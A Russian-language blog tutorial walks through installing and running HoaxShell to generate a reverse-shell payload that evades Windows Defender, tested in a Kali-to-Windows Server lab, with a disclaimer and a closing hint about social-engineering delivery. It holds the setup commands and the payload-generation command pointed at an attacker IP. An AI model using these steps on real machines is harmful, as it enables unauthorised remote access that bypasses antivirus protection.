Мы уже рассказывали, как обходить антивирусы. Сегодня покажу, как создать беспалевный реверс шелл, запуск которого не обнаружит защитник Windows. В создании беспалевной полезной нагрузки поможет инструмент HoaxShell.
Еще по теме: Как скрыть процессы от антивирусов
Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы, были использованы собственные устройства автора. Использование подобных техник обхода антивирусов на чужих устройствах, без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Сайт и авторы spy-soft.net не несут ответственность за ваши действия.
Как создать беспалевный реверс шелл с HoaxShell
Hoaxshell — это инструмент для создания полезной нагрузки reverse shell (реверс шелл) и хендлер. Тулза позволяет сгенерировать полезную нагрузку и после выполнения, удаленно подключиться к целевому компьютеру Windows.
На скрине показан принцип работы.
Лаборатория, которую я использовал для тестирования HoaxShell, представляла собой следующее:
- Kali Linux (атакующая машина)
- Windows Server 2016 (целевая машина)
- HoaxShell — инструмент для создания реверс шелла
Установка HoaxShell на Kali Linux
Прежде всего надо клонировать официальный репозиторий, для этого выполните команду:
1 |
git clone https://github.com/t3l3machus/hoaxshell |
Перейдите в директорию hoaxshell:
1 |
cd hoaxshell |
Для установки зависимостей (необходимых пакетов Python), используйте pip3
1 |
pip3 install -r requirements.txt |
Отлично, мы установили инструмент.
Использование HoaxShell на Kali Linux
Теперь, чтобы добавить свой IP-адрес, запустите тулзу с параметром -s:
1 |
python3 hoaxshell.py -s IP_адрес_Kali_Linux |
Мы создали полезную нагрузку.
Теперь переходим на целевую машину (в моем случае виртуальную машину Windows Server 2016) и с включенный антивирусом Windows выполняем полезную нагрузку.
Возвращаемся на Kali Linux и видим, что реверс шелл был запущен на целевом компьютере и успешно обошел антивирус Windows.
Заключение
При пентестах, если нет физического доступа к устройству, тогда можете использовать методы социальной инженерии. Но не стоит это делать без письменного разрешения на проведение тестирования на проникновение.
РЕКОМЕНДУЕМ: